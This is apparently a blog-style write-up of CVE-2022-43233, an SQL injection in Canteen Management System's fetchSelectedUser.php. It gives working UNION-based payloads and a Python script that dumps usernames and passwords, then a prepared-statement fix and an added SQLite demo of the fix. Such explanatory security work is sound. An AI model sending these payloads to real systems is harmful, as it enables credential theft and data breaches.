CVE-2022-43233 is a critical SQL Injection vulnerability discovered in the Canteen Management System v1., an open-source web application widely used by schools and organizations to handle canteen operations. The issue affects the userid parameter in the file /php_action/fetchSelectedUser.php, allowing attackers to run arbitrary SQL commands on the database. This post breaks down the vulnerability step by step, shows the exploitation technique with code snippets, and discusses how you can protect your system.

Original References

- CVE Record: https://nvd.nist.gov/vuln/detail/CVE-2022-43233
- Exploit Proof: Packet Storm Report
- Original Source Code: Canteen Management System v1.

Vulnerability Overview

When an insecure application takes user input and places it directly into an SQL query without any kind of sanitization, it becomes susceptible to SQL injection. Attackers can use this opportunity to execute their own commands against the database, which may include dumping sensitive data or changing entries.

In the context of the Canteen Management System v1., the vulnerable script /php_action/fetchSelectedUser.php retrieves the userid from user input and passes it directly into a SQL statement:

// Rough snippet from fetchSelectedUser.php
$user_id = $_POST['userid'];
$sql = "SELECT * FROM users WHERE user_id = $user_id";
$result = $conn->query($sql);

Notice how $user_id is not validated or sanitized—that’s the root of the problem.

Proof of Concept (PoC) Exploit

Let’s walk through a simple attack using a POST request. A hacker could send specially crafted data like this:

POST /php_action/fetchSelectedUser.php HTTP/1.1
Host: target-site.com
Content-Type: application/x-www-form-urlencoded

userid=1 OR 1=1

Expected SQL Query

SELECT * FROM users WHERE user_id = 1 OR 1=1

This query will *always* return all users, since 1=1 is always true.

More Dangerous Exploit: Dumping Passwords

A skilled attacker could use UNION injection to try to list all usernames and passwords.

POST /php_action/fetchSelectedUser.php HTTP/1.1
Host: target-site.com
Content-Type: application/x-www-form-urlencoded

userid= UNION SELECT 1, username, password, 4 FROM users--

If the users table contains the columns (id, username, password, role), the script may dump usernames and passwords into the page intended to display user details.

Here’s a very basic Python snippet using requests to automate this attack:

import requests

url = 'http://target-site.com/php_action/fetchSelectedUser.php'
data = {'userid': " UNION SELECT 1, username, password, 4 FROM users--"}
r = requests.post(url, data=data)

print(r.text)  # This will print the page, possibly showing usernames and hashed passwords

Remediation and Prevention

- ALWAYS use prepared statements (parameterized queries) instead of concatenating user input into SQL.

Fixed code example using prepared statements (MySQLi):

$user_id = $_POST['userid'];
// The placeholder is bound as an integer ("i"), so the value is sent as data and never parsed as SQL
$stmt = $conn->prepare("SELECT * FROM users WHERE user_id = ?");
$stmt->bind_param("i", $user_id);
$stmt->execute();
$result = $stmt->get_result();
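To see why the prepared statement closes the hole, here is an added Python example (not code from this post or from the Canteen Management System project) that replays the post's 1 OR 1=1 input against the concatenated query, the parameterized query, and a further hardened lookup. It uses an in-memory SQLite table with constructed rows as a stand-in for the MySQL users table; the column names follow the post.

```python
import sqlite3

# Constructed sample rows standing in for the application's users table;
# the column names follow the post (id, username, password, role).
SAMPLE_USERS = [
    (1, "admin", "hash_admin", "admin"),
    (2, "alice", "hash_alice", "staff"),
    (3, "bob", "hash_bob", "staff"),
]


def make_db():
    """In-memory SQLite stand-in for the MySQL users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, "
                 "username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def fetch_user_vulnerable(conn, userid):
    """Mirrors the original fetchSelectedUser.php: the POST value is
    concatenated into the query text, so SQL inside it runs as SQL."""
    sql = f"SELECT * FROM users WHERE user_id = {userid}"
    return conn.execute(sql).fetchall()


def fetch_user_fixed(conn, userid):
    """Mirrors the prepared-statement fix: the value travels as a bound
    parameter and is compared as data, never parsed as SQL."""
    return conn.execute("SELECT * FROM users WHERE user_id = ?",
                        (userid,)).fetchall()


def fetch_user_hardened(conn, userid):
    """On top of binding: accept only a plain integer id (what bind_param("i")
    implies) and select only the columns the details page needs, so password
    hashes never reach the template even if output handling is sloppy."""
    if not isinstance(userid, str) or not userid.strip().isdigit():
        return []
    return conn.execute("SELECT user_id, username, role FROM users "
                        "WHERE user_id = ?", (int(userid),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "1 OR 1=1"  # the post's first PoC input
    print("vulnerable:", fetch_user_vulnerable(db, payload))  # all three rows
    print("fixed:     ", fetch_user_fixed(db, payload))       # []
    print("hardened:  ", fetch_user_hardened(db, "2"))        # [(2, 'alice', 'staff')]
```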

Impact

- Data breach. Exposes confidential user information.

- Account compromise. Attackers can get admin usernames and hashed (possibly even plaintext) passwords.

Disclosing CVE-2022-43233

Responsible disclosure practices recommend contacting the vendor/developer. Canteen Management System is hosted on SourceCodester; issues should be reported through their site or GitHub repo if available.

Conclusion

SQL Injection flaws like CVE-2022-43233 are extremely dangerous but also easily avoided by using prepared statements. Given the sensitive nature of the Canteen Management System (handling user and payment info), patching and updating systems is crucial.

If you use Canteen Management System v1., you should update the affected scripts immediately and audit for similar issues elsewhere in your codebase.

Further Reading

- OWASP SQL Injection
- SQL Injection Prevention Cheat Sheet
- Canteen Management System Source Page

Timeline

Published on: 10/28/2022 18:15:00 UTC
Last modified on: 10/28/2022 19:48:00 UTC